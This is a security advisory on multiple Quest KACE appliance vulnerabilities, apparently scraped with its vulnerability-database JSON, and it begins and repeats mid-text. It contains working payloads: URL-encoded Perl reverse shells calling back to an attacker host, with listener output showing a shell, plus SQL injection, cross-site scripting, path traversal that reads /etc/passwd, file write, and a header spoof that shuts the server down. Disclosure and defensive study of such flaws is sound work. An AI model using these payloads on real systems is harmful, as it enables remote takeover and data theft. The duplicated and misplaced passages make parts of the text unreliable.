TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that require higher privileges, the application relies on a message queue manager (the Sudo Server) that runs with root privileges and only accepts a fixed set of commands.
One of the available commands allows to change any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] The 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are meant to be accessible only from localhost, but the check relies on the client-supplied 'Host' and 'X-Forwarded-For' HTTP headers, so it can be bypassed by setting them to 'localhost' and '::1' respectively (as in the request below). Source-address restrictions have to be enforced on the actual connection (or by a trusted reverse proxy that overwrites these headers), never on values the client controls.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/-----
POST /systemui/settings_network.php HTTP/1.1
Host: localhost
X-Forwarded-For: ::1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ServerIp]/systemui/settings_network.php
Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129
Content-Length: 3418
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. Unauthenticated SQL Injection in download_agent_installer.php
[CVE-2018-11136] The 'orgID' parameter received by the '/common/download_agent_installer.php' script is not sanitized, leading to SQL injection; specifically, a blind, time-based SQL injection.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL Injection in run_report.php
[CVE-2018-11140] The 'reportID' parameter received by the '/common/run_report.php' script is not sanitized, leading to SQL injection; specifically, an error-based SQL injection.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross Site Scripting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded). Files can be at any location where the 'www' user has write permissions.
File deletion could be abused to delete the '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence determines whether the appliance setup wizard is shown.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Using the issues described in 7.2 and 7.4, we were able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are requested once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication channel, also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core for its reply and stated it would be in touch during the process. 2018-03-20: Quest Support informed Core that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (which was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and for the level of thoroughness and detail provided. Quest specified it already had fixes in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified Core that the work done by Core is in breach of its license agreement, and requested that Core not distribute the findings to the public, otherwise Quest would take legal action. 
2018-04-13: Quest's KACE PM sent a follow-up email and informed Core that it had made a hotfix to patch the reported vulnerabilities. Quest also requested a call to understand future opportunities based on Core's company capabilities. Finally, Quest asked for information about the researchers who found the vulnerabilities and a link of Core's choosing to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered the email from 2018-03-26 stating that the company is following standard practices with regard to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned that Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry-standard disclosure processes that involve publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked Quest for the answer and stated its willingness to keep written communications between the parties in order to better document the process, and communicated the next steps of the process, including: 1. Testing the fix (if the vendor agrees), 2. Getting CVE-IDs, 3. Getting a vendor link to be included in the advisory, and finally 4. Sending the final advisory version to the vendor and coordinating the publication date together. 
With regard to Quest's requests, Core provided the researchers' names and the URL at which the advisory would be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked for the right contact at Quest), but that our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed Core that they had publicly made patches available for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity &amp; access, network security, and vulnerability management solutions provide the actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0598",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"db": "NVD",
"id": "CVE-2018-11138"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11138"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11138",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-11138",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-10907",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11138",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11138",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-10907",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1216",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2018-11138",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"db": "VULMON",
"id": "CVE-2018-11138"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"db": "NVD",
"id": "CVE-2018-11138"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The \u0027/common/download_agent_installer.php\u0027 script in the Quest KACE System Management Appliance 8.0.318 is accessible by anonymous users and can be abused to execute arbitrary commands on the system. Quest KACE Systems Management Appliance Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance provides comprehensive system management for all network connected devices. A command injection vulnerability exists in the \u0027/common/download_agent_installer.php\u0027 script in QuestKACESystemManagementAppliance8.0.318. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nQuest KACE System Management Appliance Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. 
*Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. 
\n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\nOther products and versions might be affected too, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. 
*Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. 
The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 